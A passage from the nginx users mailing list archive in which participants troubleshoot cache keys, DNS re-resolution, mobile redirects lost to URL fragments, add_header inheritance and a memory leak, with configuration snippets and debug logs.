refer to nginx directive example: proxy_cache_key "$host$request_uri $cookie_user"; or by default is proxy_cache_key $scheme$proxy_host$uri$is_args$args; >>I plan to add "load balancing" module, which would be able to forward request on (multiple) source addresses to multiple proxied addresses, with caching.. Will it work properly? if your nginx is acting as load balancer, I guess better add load balancing module. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260086,260088#msg-260088 From nginx-forum at nginx.us Mon Jul 6 14:10:29 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Mon, 06 Jul 2015 10:10:29 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <20150706122207.GS23844@daoine.org> References: <20150706122207.GS23844@daoine.org> Message-ID: <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> Hi I tested in a iPad and Safari the request and the nginx log reported a 401 error : xxx.xxx.xxx.xxx - - [06/Jul/2015:13:42:24 +0000] "GET /pt/api_cp/user_counts/ HTTP/1.1" 401 27 "http://m.domain.com/" "Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4" But this i think is not an error associated with faulty url Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260091#msg-260091 From nginx-forum at nginx.us Mon Jul 6 14:11:47 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Mon, 06 Jul 2015 10:11:47 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> Message-ID: <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> I entered in a url an url similar to the tested before : http://www.domain.com/#\!/pt/--item-view/en/3190/Wok-Vintage And the Nginx didn't recorded 
the access in the nginx access.log file

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260092#msg-260092

From mdounin at mdounin.ru Mon Jul 6 14:30:03 2015
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Mon, 6 Jul 2015 17:30:03 +0300
Subject: DNS cache in nginx
In-Reply-To:
References:
Message-ID: <20150706143003.GG1656@mdounin.ru>

Hello!

On Sat, Jul 04, 2015 at 09:42:06AM +0300, Shay Peretz wrote:

> Hello ,
>
> I have an A record which resolve to 2 CNAME's , the DNS failover will
> make the switch if something go wrong .
>
> The problem is that after a change the nginx stick to the OLD IP
> unless I reload it ..
> any way the Caching can be disabled ?
> I tried the following with no success :
> add valid for the resolver ,
> resolver 8.8.8.8 valid=5s;
> and or
> resolver_timeout 1s;
>
> Any recommendation to solve it ?

As long as you write host names in nginx configuration, nginx will resolve these names while parsing the configuration. It won't notice any changes unless the configuration is reloaded.

If you want nginx to periodically re-resolve names, there are two options available:

1) Use proxy_pass with variables:

    resolver 127.0.0.1;
    set $upstream "backend.example.com";
    proxy_pass http://$upstream;

   When variables are used in the "proxy_pass" directive, nginx will resolve names at runtime. See http://nginx.org/r/proxy_pass for details.

2) Use the "resolve" flag in an upstream{} block. Only available in nginx plus, see http://nginx.org/en/docs/http/ngx_http_upstream_module.html#resolve for details.

Alternatively, you may consider using nginx mechanisms to do failover instead.
See these links for some details:

http://nginx.org/en/docs/http/ngx_http_upstream_module.html
http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_next_upstream

--
Maxim Dounin
http://nginx.org/

From arut at nginx.com Mon Jul 6 15:44:20 2015
From: arut at nginx.com (Roman Arutyunyan)
Date: Mon, 6 Jul 2015 18:44:20 +0300
Subject: proxy_cache_key with variables
In-Reply-To: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org>
References: <4bba580c15f00298d19ab26392ff42d4.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <5285AE78-036C-4160-817A-E5334B035E1B@nginx.com>

> On 06 Jul 2015, at 16:49, sz_g wrote:
>
> I've just created a configuration composed of two servers.
> Both just forwards traffic from different ports (and protocols) to different
> servers, and keep responses in cache. It works nice.
>
> For both servers "GET /" request is sent, in the response there is proper
> resource. Thus (to distinguish responses in the cache) I added for both
> cache_key:
>
> proxy_cache_key "$upstream_addr*$request";

At the time when this expression is evaluated, $upstream_addr is still unknown since no upstream connection is made. Obviously, if a key is found in cache, there will be no upstream connection at all. So it's not a good idea to use $upstream_addr in key definition. Instead, you can use the parts of request which define the upstream address.

>
> But it doesn't work. I found that upstream states are not available and thus
> "proxied" address is not known when cache key is computed. And "proxied"
> address is computed only when additional stream must be used..
>
> Is there any way to get proper key? Or any other way to keep all copies in
> the cache?
>
> I plan to add "load balancing" module, which would be able to forward
> request on (multiple) source addresses to multiple proxied addresses, with
> caching.. Will it work properly?
>
> Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260086,260086#msg-260086
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>

--
Roman Arutyunyan

From nginx-forum at nginx.us Mon Jul 6 16:39:38 2015
From: nginx-forum at nginx.us (ramsoft75)
Date: Mon, 06 Jul 2015 12:39:38 -0400
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To: <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org>
References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

I am running Nginx with logging in debug mode and the report for "^/$" is :

2015/07/06 15:32:21 [debug] 6500#0: *9 accept: 193.137.170.139 fd:20
2015/07/06 15:32:21 [debug] 6500#0: *9 event timer add: 20: 60000:1436196801837
2015/07/06 15:32:21 [debug] 6500#0: *9 reusable connection: 1
2015/07/06 15:32:21 [debug] 6500#0: *9 epoll add event: fd:20 op:1 ev:80000001
2015/07/06 15:32:21 [debug] 6500#0: accept() not ready (11: Resource temporarily unavailable)
2015/07/06 15:32:21 [debug] 6500#0: *9 post event 0000000000AC5440
2015/07/06 15:32:21 [debug] 6500#0: *9 delete posted event 0000000000AC5440
2015/07/06 15:32:21 [debug] 6500#0: *9 http wait request handler
2015/07/06 15:32:21 [debug] 6500#0: *9 posix_memalign: 0000000000922D70:256 @16
2015/07/06 15:32:21 [debug] 6500#0: *9 malloc: 0000000000A450C0:1024
2015/07/06 15:32:21 [debug] 6500#0: *9 recv: fd:20 427 of 1024
2015/07/06 15:32:21 [debug] 6500#0: *9 reusable connection: 0
2015/07/06 15:32:21 [debug] 6500#0: *9 posix_memalign: 0000000000A46810:4096 @16
2015/07/06 15:32:21 [debug] 6500#0: *9 http process request line
2015/07/06 15:32:21 [debug] 6500#0: *9 http request line: "GET / HTTP/1.1"
2015/07/06 15:32:21 [debug] 6500#0: *9 http uri: "/"
2015/07/06 15:32:21 [debug] 6500#0: *9 http args: ""
2015/07/06 15:32:21 [debug] 6500#0: *9 http exten: ""
2015/07/06 15:32:21 [debug] 6500#0: *9 posix_memalign: 0000000000A47E10:4096 @16
2015/07/06 15:32:21 [debug] 6500#0: *9 http process request header line
2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Host: www.domain.com"
2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Accept-Encoding: gzip, deflate"
2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Accept-Language: pt-pt"
2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Cookie: cookie=true; lang=pt; _ga=GA1.2.894621310.1424776292"
2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Connection: keep-alive"
2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "DNT: 1"
2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
2015/07/06 15:32:21 [debug] 6500#0: *9 http header done
2015/07/06 15:32:21 [debug] 6500#0: *9 event timer del: 20: 1436196801837
2015/07/06 15:32:21 [debug] 6500#0: *9 generic phase: 0
2015/07/06 15:32:21 [debug] 6500#0: *9 rewrite phase: 1
2015/07/06 15:32:21 [debug] 6500#0: *9 http script var
2015/07/06 15:32:21 [debug] 6500#0: *9 http script var: "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
2015/07/06 15:32:21 [debug] 6500#0: *9 http script regex: "(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)"
2015/07/06 15:32:21 [notice] 6500#0: *9 "(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)" matches "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53", client: 193.137.170.139, server: www.domain.com, request: "GET / HTTP/1.1", host: "www.domain.com"
2015/07/06 15:32:21 [debug] 6500#0: *9 http script if
2015/07/06 15:32:21 [debug] 6500#0: *9 http script regex: "^/$"
2015/07/06 15:32:21 [notice] 6500#0: *9 "^/$" matches "/", client: 193.137.170.139, server: www.domain.com, request: "GET / HTTP/1.1", host: "www.domain.com"
2015/07/06 15:32:21 [debug] 6500#0: *9 http script copy: "http://m.domain.com/"
2015/07/06 15:32:21 [debug] 6500#0: *9 http script capture: ""
2015/07/06 15:32:21 [debug] 6500#0: *9 http script regex end
2015/07/06 15:32:21 [notice] 6500#0: *9 rewritten redirect: "http://m.domain.com/", client: 193.137.170.139, server: www.domain.com, request: "GET / HTTP/1.1", host: "www.domain.com"
2015/07/06 15:32:21 [debug] 6500#0: *9 http finalize request: 301, "/?" a:1, c:1
2015/07/06 15:32:21 [debug] 6500#0: *9 http special response: 301, "/?"
2015/07/06 15:32:21 [debug] 6500#0: *9 http set discard body
2015/07/06 15:32:21 [debug] 6500#0: *9 xslt filter header
2015/07/06 15:32:21 [debug] 6500#0: *9 HTTP/1.1 301 Moved Permanently

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260096#msg-260096

From nginx-forum at nginx.us Mon Jul 6 16:40:37 2015
From: nginx-forum at nginx.us (ramsoft75)
Date: Mon, 06 Jul 2015 12:40:37 -0400
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To:
References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <7362a9bc51bfa4573fd919369ca2b256.NginxMailingListEnglish@forum.nginx.org>

The "^/$" came from :

    #to detect if the device with www entered in domain is mobile
    if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') {
        rewrite ^/$ http://m.domain.com$request_uri;
    }

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260097#msg-260097

From nginx-forum at nginx.us Mon Jul 6 16:57:00 2015
From: nginx-forum at nginx.us (ramsoft75)
Date: Mon, 06 Jul 2015 12:57:00 -0400
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To:
References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

Hi

I think the part where the parameters are clean is :

2015/07/06 15:32:21 [debug] 6500#0: *9 http script copy: "http://m.domain.com/"
2015/07/06 15:32:21 [debug] 6500#0: *9 http script capture: ""
2015/07/06 15:32:21 [debug] 6500#0: *9 http script regex end
2015/07/06 15:32:21 [notice] 6500#0: *9 rewritten redirect: "http://m.domain.com/", client: xxx.xxx.xxx.xxx, server: www.domain.com, request: "GET / HTTP/1.1", host: "www.domain.com"
2015/07/06 15:32:21 [debug] 6500#0: *9 http finalize request: 301, "/?" a:1, c:1
2015/07/06 15:32:21 [debug] 6500#0: *9 http special response: 301, "/?"
2015/07/06 15:32:21 [debug] 6500#0: *9 http set discard body
2015/07/06 15:32:21 [debug] 6500#0: *9 xslt filter header
2015/07/06 15:32:21 [debug] 6500#0: *9 HTTP/1.1 301 Moved Permanently

I can't understand the last lines, what does it mean

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260098#msg-260098

From francis at daoine.org Mon Jul 6 18:20:36 2015
From: francis at daoine.org (Francis Daly)
Date: Mon, 6 Jul 2015 19:20:36 +0100
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To: <7362a9bc51bfa4573fd919369ca2b256.NginxMailingListEnglish@forum.nginx.org>
References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> <7362a9bc51bfa4573fd919369ca2b256.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20150706182036.GT23844@daoine.org>

On Mon, Jul 06, 2015 at 12:40:37PM -0400, ramsoft75 wrote:

Hi there,

Things seem to be getting a lot more complicated than they need to.

> The "^/$" came from :
>
> #to detect if the device with www entered in domain is mobile
> if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows
> Phone)') {
> rewrite ^/$ http://m.domain.com$request_uri;
> }

That's not the configuration you started with.

You indicated that with your starting configuration, some requests did get the response that you wanted, and some did not. I have been unable to reproduce the "did not" case; probably because I do not fully understand what your expectations are.

Can you go back to your starting configuration, and do whatever it takes to get the "ok" request/response, and then show the access_log entry for that request? (Or just find the old log file.) The log line should show a GET going to the "www" server, with a response code of 302. Ideally, it will also show the user-agent involved.

Then can you show the log line corresponding to a "not ok" request/response? It should also show a GET going to the "www" server, with a response code of 302, if I have understood correctly what you have reported.

Comparing the two log lines, particularly the request and the user-agent, may show why the "not ok" one responded as it did.

f
--
Francis Daly francis at daoine.org

From nginx-forum at nginx.us Mon Jul 6 18:33:08 2015
From: nginx-forum at nginx.us (Alt)
Date: Mon, 06 Jul 2015 14:33:08 -0400
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To: <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org>
References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <98634d5bc2fff4df7585f42a27e4d5ed.NginxMailingListEnglish@forum.nginx.org>

Why don't you try with requests to real pages, not to a fragment? "#" and everything after this character isn't sent to the web server, it's only used by the web client.
You really should read at least: https://en.wikipedia.org/wiki/Fragment_identifier

Some browsers will keep the fragment after the redirect, some others will drop it.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260101#msg-260101

From nginx-forum at nginx.us Mon Jul 6 22:20:26 2015
From: nginx-forum at nginx.us (Alt)
Date: Mon, 06 Jul 2015 18:20:26 -0400
Subject: Multiple add_header
Message-ID:

Hello,

I'm using PHP with nginx 1.9.2 and it works great! But there's something I don't understand with the add_header directive. I use add_header in server and location block, but it seems only the one in location is used. If I remove the add_header in the location block, I get the header I added in the server block.

Here's a short example:

    server {
        add_header Strict-Transport-Security "max-age=604800; includeSubDomains";

        location = /blah {
            add_header X-Test test;
        }
    }

If I access /blah, I'll only get the X-Test header, while I'd like to get X-Test and Strict-Transport-Security. If I comment the add_header in the blah location and access /blah, I'll get the Strict-Transport-Security header.

How can I solve this problem, without having to duplicate/include "add_header Strict-Transport-Security" everywhere?

Seems http://stackoverflow.com/a/19135714 is the same problem.

Best Regards

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260102,260102#msg-260102

From nginx-forum at nginx.us Mon Jul 6 22:41:29 2015
From: nginx-forum at nginx.us (okamzol)
Date: Mon, 06 Jul 2015 18:41:29 -0400
Subject: Multiple add_header
In-Reply-To:
References:
Message-ID: <410fcdde2c65acf8fa03dd19b88763fc.NginxMailingListEnglish@forum.nginx.org>

Hi,

there is no chance to avoid the duplicates. I asked the same questions some time ago. For detailed answer on my question see http://forum.nginx.org/read.php?2,256270,256279#msg-256279. I think this will answer your question too.
Best Regards

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260102,260103#msg-260103

From nginx-forum at nginx.us Mon Jul 6 22:55:16 2015
From: nginx-forum at nginx.us (Alt)
Date: Mon, 06 Jul 2015 18:55:16 -0400
Subject: Multiple add_header
In-Reply-To: <410fcdde2c65acf8fa03dd19b88763fc.NginxMailingListEnglish@forum.nginx.org>
References: <410fcdde2c65acf8fa03dd19b88763fc.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <814a692e7a0700d6c1270360a6d45d7d.NginxMailingListEnglish@forum.nginx.org>

Hello okamzol and thanks a lot for your answer!

Yes, it's exactly the same question, looks like I'll need to use include.

Best Regards

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260102,260104#msg-260104

From nginx-forum at nginx.us Tue Jul 7 01:34:25 2015
From: nginx-forum at nginx.us (xfeep)
Date: Mon, 06 Jul 2015 21:34:25 -0400
Subject: [ANN] Nginx-Clojure v0.4.0 Release!
In-Reply-To: <690dccaf31f4ce67dc0a42182a10ca8d.NginxMailingListEnglish@forum.nginx.org>
References: <690dccaf31f4ce67dc0a42182a10ca8d.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <315749521a56ab63b718c5a005489230.NginxMailingListEnglish@forum.nginx.org>

Freebsd port upgraded nginx clojure module from 0.3.0 to 0.4.0!
So on Freebsd we can choose clojure module to enable it after run

    pkg install nginx
    cd /usr/ports/www/nginx
    make config

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260065,260105#msg-260105

From nginx-forum at nginx.us Tue Jul 7 06:25:41 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Tue, 07 Jul 2015 02:25:41 -0400
Subject: leaking memory nginx 1.8.0
Message-ID: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org>

Hello, need help with leaking memory
i installed fresh system , centos7.1 +directadmin + nginx1.8.0 +
mariadb5.5.41 + php54 & php56 both with php_fpm
the server it for webhosting and i have there 32gb for now have only 4
website on it, and after 1-2hours nginx take all memory when it come to 96%
it stop there and then all websites fall but nginx not, only after i reset
nginx all back to normal for 1-2hours again.

how can i debug where the problem? or try find the problem? seems in logs i
not see anything

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260106#msg-260106

From umarzuki at gmail.com Tue Jul 7 06:51:18 2015
From: umarzuki at gmail.com (Umarzuki Mochlis)
Date: Tue, 7 Jul 2015 14:51:18 +0800
Subject: leaking memory nginx 1.8.0
In-Reply-To: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org>
References: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

2015-07-07 14:25 GMT+08:00 evgeni22 :
> Hello, need help with leaking memory
> i installed fresh system , centos7.1 +directadmin + nginx1.8.0 +
> mariadb5.5.41 + php54 & php56 both with php_fpm
> the server it for webhosting and i have there 32gb for now have only 4
> website on it, and after 1-2hours nginx take all memory when it come to 96%
> it stop there and then all websites fall but nginx not, only after i reset
> nginx all back to normal for 1-2hours again.
>
> how can i debug where the problem? or try find the problem? seems in logs i
> not see anything
>

check your file descriptors' limit, try increasing it

# ulimit -n

From oscaretu at gmail.com Tue Jul 7 07:21:01 2015
From: oscaretu at gmail.com (oscaretu .)
Date: Tue, 7 Jul 2015 09:21:01 +0200
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To: <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org>
References: <20150703174730.GP23844@daoine.org> <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

You should protect the URL with single quotes, to avoid the interpretation of character ! by the shell:

    curl -A iPad -i 'https://www.domain.com/#!/pt/--item-view/pt/32081/Mix-J'

But if you put the URL

    https://www.domain.com/#!/pt/--item-view/pt/32081/Mix-J

in a browser (at least in Firefox), the browser sends to the web server only the first part of that URL:

    https://www.domain.com/

because the character # is a special one.

Surprisingly, curl sends the full URL to the webserver.

Greetings,

Oscar

On Sun, Jul 5, 2015 at 9:31 PM, ramsoft75 wrote:

> Hi there
>
> I changed to
>
> #to detect if the device with www entered in domain is mobile
> if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows
> Phone)') {
> rewrite ^ http://m.domain.com$request_uri;
> }
>
> I executed the command :
>
> $ curl -A iPad -i https://www.domain.com/#!/pt/--item-view/pt/32081/Mix-J
>
> And the result was :
>
> -bash: !/pt/--item-view/pt/32081/Mix-J: event not found
>
> This only append's with Safari, there's no problem with Chrome (Desktop,
> Mobile) or Internet Explorer in Pc, could this be a browser problem and not
> an Nginx configuration problem ?
>
> Thanks
>
> Posted at Nginx Forum:
> http://forum.nginx.org/read.php?2,260033,260064#msg-260064
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>

--
Oscar Fernandez Sierra
oscaretu at gmail.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From nginx-forum at nginx.us Tue Jul 7 08:02:09 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Tue, 07 Jul 2015 04:02:09 -0400
Subject: leaking memory nginx 1.8.0
In-Reply-To:
References:
Message-ID:

do you sure to increase? does not it will eat faster the memory?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260109#msg-260109

From nginx-forum at nginx.us Tue Jul 7 09:28:56 2015
From: nginx-forum at nginx.us (ramsoft75)
Date: Tue, 07 Jul 2015 05:28:56 -0400
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To:
References:
Message-ID: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org>

Hi there all and thanks for the help

Dear oscaretu, the curl was tested with " doesn't help, because ! is a special character it needs a escape after "\", so the correct curl command for the terminal is :

    $ curl -A iPad -i http://www.domain.com/#\!/pt/--item-view/en/3190/Wok

Dear Francis Daly

For the initial configuration :

    if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') {
        rewrite ^ http://m.domain.com/$request_uri;
    }

For the example above the output in terminal is :

    HTTP/1.1 302 Moved Temporarily
    Server: nginx
    Date: Tue, 07 Jul 2015 09:19:47 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: keep-alive
    Location: http://m.domain.com//

    302 Found
    302 Found
    nginx

It's the same if i changed to :

    if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') {
        rewrite ^/$ http://m.domain.com/$request_uri;
    }

The problem is not from Nginx but from Safari which doesn't send the url after #, the Safari removes the fragment.

There are some documentation about this in :

http://randomproblems.com/parameter-passing-redirect-craziness-301-redirects-fragment-identifiers-hash-query-string-variables/
http://news.qooxdoo.org/http-redirects-and-loss-of-fragment-identifiers

The question now how to handle this # problem with Safari.

Thanks for the help

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260110#msg-260110

From nginx-forum at nginx.us Tue Jul 7 10:29:35 2015
From: nginx-forum at nginx.us (Alt)
Date: Tue, 07 Jul 2015 06:29:35 -0400
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org>
References: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <53d0b39a2647105dc8f0ca631b396070.NginxMailingListEnglish@forum.nginx.org>

Hello,

Francis Daly asked you several times to check the access.log file (you should not find the fragment part in there). oscaretu and I told you browsers don't send the fragment part of an URL. The problem isn't from nginx nor the browser: it's a normal behavior.

Best Regards

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260111#msg-260111

From nginx-forum at nginx.us Tue Jul 7 11:07:58 2015
From: nginx-forum at nginx.us (smsmaddy1981)
Date: Tue, 07 Jul 2015 07:07:58 -0400
Subject: Static content
In-Reply-To:
References:
Message-ID:

Hi Mike

Thanks for your quick reply...

To answer your questions:
- Upstream servers yes (where applications are deployed). And, not NGinx installations.
- I tried accessing the static content on other servers, that isn't working... I tried using root, rewrite,.. directives.
Is it possible to share a code snippet to achieve this use case pls.?

Regards,
Maddy

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259989,260112#msg-260112

From oscaretu at gmail.com Tue Jul 7 12:32:30 2015
From: oscaretu at gmail.com (oscaretu .)
Date: Tue, 7 Jul 2015 14:32:30 +0200
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org>
References: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

You don't need to escape the "!" if you delimit the URL with single quotes...

On Tue, Jul 7, 2015 at 11:28 AM, ramsoft75 wrote:

> Hi there all and thanks for the help
>
> Dear oscaretu, the curl was tested with " doesn't help, because ! is a
> special character it needs a escape after "\", so the correct curl command
> for the terminal is :
>
> $ curl -A iPad -i http://www.domain.com/#\!/pt/--item-view/en/3190/Wok
>
> Dear Francis Daly
>
> For the initial configuration :
>
> if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows
> Phone)') {
> rewrite ^ http://m.domain.com/$request_uri;
> }
>
>
> For the example above the output in terminal is :
>
> HTTP/1.1 302 Moved Temporarily
> Server: nginx
> Date: Tue, 07 Jul 2015 09:19:47 GMT
> Content-Type: text/html
> Content-Length: 154
> Connection: keep-alive
> Location: http://m.domain.com//
>
> 302 Found
> 302 Found
> nginx
>
> It's the same if i changed to :
>
> if ($http_user_agent ~*
> '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') {
> rewrite ^/$ http://m.domain.com/$request_uri;
> }
>
> The problem is not from Nginx but from Safari which doesn't send the url
> after #, the Safari removes the fragment.
>
> There are some documentation about this in :
>
>
> http://randomproblems.com/parameter-passing-redirect-craziness-301-redirects-fragment-identifiers-hash-query-string-variables/
> http://news.qooxdoo.org/http-redirects-and-loss-of-fragment-identifiers
>
> The question now how to handle this # problem with Safari.
>
> Thanks for the help
>
> Posted at Nginx Forum:
> http://forum.nginx.org/read.php?2,260033,260110#msg-260110
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>

--
Oscar Fernandez Sierra
oscaretu at gmail.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From nginx-forum at nginx.us Tue Jul 7 13:03:53 2015
From: nginx-forum at nginx.us (evgeni22)
Date: Tue, 07 Jul 2015 09:03:53 -0400
Subject: leaking memory nginx 1.8.0
In-Reply-To:
References:
Message-ID: <347e4be1a5f3ab08f272e881541f2e1a.NginxMailingListEnglish@forum.nginx.org>

$ su nginx --shell /bin/bash --command "ulimit -n"
4096

it not fix the problem

nginx 10062 0.0 44.5 14763332 14639972 ? S 14:56 0:00 nginx: worker process
nginx 10063 0.0 44.5 14763332 14639964 ? S 14:56 0:00 nginx: worker process
nginx 10064 0.1 44.5 14763332 14639984 ? S 14:56 0:00 nginx: worker process
nginx 10065 0.1 44.5 14763332 14640880 ? S 14:56 0:00 nginx: worker process

have you more advice?
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260114#msg-260114

From nginx-forum at nginx.us Tue Jul 7 14:44:46 2015
From: nginx-forum at nginx.us (ramsoft75)
Date: Tue, 07 Jul 2015 10:44:46 -0400
Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad
In-Reply-To: <53d0b39a2647105dc8f0ca631b396070.NginxMailingListEnglish@forum.nginx.org>
References: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org> <53d0b39a2647105dc8f0ca631b396070.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

"Hello,

Francis Daly asked you several times to check the access.log file (you should not find the fragment part in there). oscaretu and I told you browsers don't send the fragment part of an URL. The problem isn't from nginx nor the browser: it's a normal behavior.

Best Regards"

Indeed there was no information in access.log, the only information i published was from error.log with nginx debug mode and an error 302 is not an error.

It's not an Nginx problem it's a Safari problem.

Best Regards

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260116#msg-260116

From vbart at nginx.com Tue Jul 7 17:04:27 2015
From: vbart at nginx.com (Valentin V. Bartenev)
Date: Tue, 07 Jul 2015 20:04:27 +0300
Subject: leaking memory nginx 1.8.0
In-Reply-To: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org>
References: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <3335299.BWqfcoXYiD@vbart-workstation>

On Tuesday 07 July 2015 02:25:41 evgeni22 wrote:
> Hello, need help with leaking memory
> i installed fresh system , centos7.1 +directadmin + nginx1.8.0 +
> mariadb5.5.41 + php54 & php56 both with php_fpm
> the server it for webhosting and i have there 32gb for now have only 4
> website on it, and after 1-2hours nginx take all memory when it come to 96%
